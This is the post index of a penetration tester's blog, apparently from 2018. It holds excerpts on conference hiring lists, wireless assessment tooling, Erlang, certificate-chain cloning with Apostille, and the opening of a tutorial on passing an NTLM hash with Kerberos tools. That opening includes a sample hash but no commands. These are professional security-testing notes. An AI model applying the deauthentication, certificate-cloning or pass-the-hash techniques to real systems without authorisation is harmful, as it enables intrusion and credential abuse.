Posts

Dec 15, 2018

Created the 2018 UNOFFICIAL ShmooCon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/I4sbeEpxMwNI6qn33
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Oct 14, 2018

I have a bit of a feature request for all wireless assessment tools out there:
Many times before arriving on site for an assessment, I’ll know the ESSIDs of a target wireless network for a client. Getting channels and BSSIDs isn’t usually an option. Also, many times during the assessment I’m performing there are physical aspects to it, like guards or cameras, so sitting down in the lobby and typing out commands to De-auth that client or BSSID isn’t really great OPSEC.

Sep 15, 2018

Erlang is a programming language that I have tried to learn a few times in the past but never really dug in, that is, until recently.
Erlang is an interesting language because it has “built-in concurrency, distribution, and fault tolerance”. To me, this means that it does job queuing and distributed tasks right out of the gate.
A little bit of history I first started digging into Erlang again from an attackers point of view at BSides Philadelphia 2016, where I talked about SolarWinds ORION.

Sep 9, 2018

Created the 2018 UNOFFICIAL Kiwicon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/hfftscOGBWp14Ust1
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Sep 1, 2018

Created the 2018 UNOFFICIAL DerbyCon Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/K6kfOY5dHH6lcQm63
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Aug 26, 2018

At Def Con 26, @singe and @_cablethief gave a talk on enterprise wireless attacks. When it’s video is released you should check it out.
During that talk, they quickly touched on a tool written by Rogan Dawes another @Sensepost-er’s tool called “Apostille”. It is esentially a certificate stealing (cloning? faking? doppelganger-ing?) tool. However, that over simplifies what it does.
To be more accurate, Apostille generates a clone of the certificate chain, identical in as many details as possible, apart from the actual key values.

Jul 27, 2018

Created the 2018 UNOFFICIAL BlackHat, DEF CON, BSidesLV Hiring List. To get on the list is even easier now! Just complete the following form: https://goo.gl/forms/dIjQHTPLk7ZYyv5D2
(One small tip, first come first serve, so if you want to be on the top of the list it’s best to submit the best info you have vs waiting on anyone, I don’t change the list order for anyone.)
Direct Link to the Hiring List Google Doc: https://docs.

Jul 24, 2018

This blog post may be of limited use, most of the time, when you have an NTLM hash, you also have the tools to use it. But, if you find yourself in a situation where you don’t have the tools and do happen to have kerberos tools, you can pass the hash with it.
Lets say with have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step to do so is to create a keytab file using ktutil:

Jul 22, 2018

In early August of 2017 I posted a few tips to Twitter regarding interviewing and getting hired in general. I’ pasting them here to preserve them. I only had 140 characters to make these, and I think there is a lot more you can do, but 30 tips is a good start.
Don’t post obvious CFAA violations to social media If you go in without a job and a chip on your shoulder, you’ll leave the same way If you don’t ask follow up questions, I won’t have any either, like “would you like the job?

Jul 9, 2018

For nearly a year I left a CoinHive miner up on the blog so that people that didn’t feel like or couldn’t afford a way to support the blog could do so via a bit of CPU power. Unfortunately during that time lots of malware started to use services like coinhive and I quickly started recieving warning that my site had been “hacked” or was showing up as malicious (har har).